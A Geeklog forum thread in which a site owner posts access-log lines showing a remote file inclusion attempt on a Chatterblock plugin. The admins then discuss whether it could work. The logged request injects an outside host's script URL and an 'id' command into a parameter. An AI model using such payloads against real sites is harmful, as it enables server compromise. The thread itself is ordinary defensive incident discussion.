Welcome to Geeklog, Anonymous Thursday, April 18 2024 @ 09:16 am EDT
Geeklog Forums
Attention
Profetas
Anonymous
Attention I have detected some attack attempts this mornig and it is coming from http://mail.omd.it/ using a cross script
here is the log file
200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"
as you can see they tried to use the cmd1.txt if you check the following URL http://mail.omd.it/cmd1.txt you'll see the code which I haven't examined yet
here is the log file
200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"
as you can see they tried to use the cmd1.txt if you check the following URL http://mail.omd.it/cmd1.txt you'll see the code which I haven't examined yet
4
3
Quote
Profetas
Anonymous
*censored* me, I think the omd has been hacked and the guy redirected the page to my site. if you go to http://omd.it it will go to my site. WTF
3
4
Quote
ill
Anonymous
Well spotted! Anyone got geeklog on a test server to check this out?
3
3
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The cmd1.txt contains the C source code for a Linux kernel exploit. So it looks like that if this somehow gets executed, it's trying to compile and run that exploit (probably to get root access on the webserver).
Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...
I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).
bye, Dirk
Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...
I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).
bye, Dirk
3
2
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
After a quick look through the source for cb_chatLog.php I have to doubt that anything was or would be executed here. The "show" parameter is used as a numeric value in the Chatterblock, doing some calculations, for example.
So to me, this looks pretty harmless.
We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.
bye, Dirk
So to me, this looks pretty harmless.
We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.
bye, Dirk
3
1
Quote
All times are EDT. The time is now 09:16 am.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content